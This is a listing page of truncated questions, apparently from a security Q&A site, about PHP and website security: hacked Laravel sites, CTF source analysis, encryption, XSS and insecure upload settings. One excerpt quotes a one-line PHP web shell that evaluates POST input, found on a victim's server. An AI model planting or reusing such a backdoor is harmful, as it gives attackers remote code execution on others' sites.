Collaborate Disseminate
I am doing a CTF and am trying to change the link so it can run a "flag" program. I was able to get the PHP source code as shown below. But I am stuck and I do not know how I should change the website link to get the flag.
http:/… Continue reading PHP Source Code CTF [closed]
someone sent me a link, and when I opened it, it redirected me to an image link, but the link contains a code, so please help me, does this code only show the hacker my ip address or is it also hacking me
The link: http://computer1.epizy.c… Continue reading Was I hacked? help me [closed]
I have a website in a shared hosting environment, and I’m also planning to back up in multiple locations. All of that introduces vulnerability where the data could get intercepted, stolen, or misused by authorized parties. The data isn’t a… Continue reading Getting Smaller Output From Public Key Cryptography In PHP
I’m storing a list of email addresses and other not personally identifiable information for a mailing list in a database. Since it’s for a project related to cryptocurrency, I believe that the information could be a target for future attac… Continue reading What’s The Best PHP Encryption For Email Addresses?
My website built upon Laravel is currently under attack.
Only the index.php file was changed, and by that I mean that every line of code is inserted above the original Laravel code. So this code executes before the legitimate Laravel code…. Continue reading How to secure Laravel website against the ongoing massive exploitation
My website is built in Laravel 8. After some time multiple fake pages were created by someone. How he got access I don’t know. pages like (example.com/free-dating-site). These are all pages indexed by Google. There are many pages but when … Continue reading My Website Hacked! Needs Possible Reasons and Solutions [duplicate]
On my website I found a file containing this code
<?php if(isset($_POST[z]))eval($_POST[z]);?>
It’s my understanding that the hacker is using this to execute any PHP command send via a POST request.
I’m trying to see how this file g… Continue reading Need guidance on detecting how a hacked file got upload on my website [duplicate]
The OWASP website has a page about Insecure File Uploads which talks about an insecure Apache filesmatch directive:
<FilesMatch ".+\.ph(p([3457s]|\-s)?|t|tml)"> SetHandler application/x-httpd-php </FileMatch>
Since I write an API for a website, I’m interested in his login system and his requests but something bothered me, I have the impression that the security system is weak…
When I login, I send POST request containing the login form, but … Continue reading Is the authentication system of this website secure enough?
While making a website I made an interesting mistake, and I’m wondering if this could be used to achieve XSS. I’ve come very close, but not quite.
I can put my user input into a string inside of a <script> tag. It looks something lik… Continue reading XSS inside of a javascript string, with unusual filter